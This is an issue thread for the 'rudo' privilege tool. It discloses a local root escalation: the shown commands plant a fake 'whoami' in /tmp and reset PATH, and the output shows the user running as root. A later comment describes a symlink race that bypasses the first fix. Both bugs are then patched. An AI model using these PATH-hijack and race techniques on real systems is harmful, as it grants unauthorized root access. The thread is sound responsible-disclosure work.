### ISSUE TITLE
rudo/0.2 Local Privilege Escalation

### ISSUE THREAD

**Issue by noproto** [shawnanastasio/rudo#1]
Using the example config, with a standard user account:

```
{
  "prompt": "Password: ",
  "session_timeout_sec": 900,
  "allowed_users": [
    {
      "username": "root",
      "permissions": {
        "allowed_commands": [
          "*"
        ]
      }
    },
    {
      "username": "nobody",
      "permissions": { "allowed_commands": [ "whoami", "ls" ] }
    }
  ]
}
```

A standard user can execute arbitrary commands by manipulating the PATH variable (`id` shown):

```
$ cd /tmp
$ echo -e '#!/bin/bash\n/usr/bin/id' > whoami
$ chmod +x whoami
$ PATH=/tmp
$ /usr/local/bin/rudo whoami
uid=0(root) gid=0(root) groups=0(root)
```

Suggested fix: Use absolute paths

**Comment by shawnanastasio** [comment]
Hi, thanks for the bug report.

I've known about this issue but since this was mostly a proof-of-concept/demo that I lost interest in, I never ended up fixing it.

I had some free time today though, so I implemented a fix in eb93de4bde8a170a0c9384d369f2c7818ce5febd. This was a quick-and-dirty attempt at a fix so there may still be an exploitable edge case, but on first glance it seems sound to me.

Let me know if you end up reviewing the fix and spot any issues.

**Comment by noproto** [comment]
```
                let command_pathbuf = which(command)?;
                let command_canonical = command_pathbuf.as_path().canonicalize()?;

                if perm_canonical == command_canonical {
                    return Ok(true);
                }
```

Introduces a race condition when the path is canonicalized. You can symlink a file to the approved path, pass the check, and swap the target out before it's executed for the same effect.

**Comment by shawnanastasio** [comment]
Nice catch, I've addressed this in 30b83a01f56a1488b39c5a817be8a9d5fcc75611. Hopefully that should be the last of these `allowed_commands` bypass bugs.

**Comment by noproto** [comment]
LGTM, thanks for the fix!
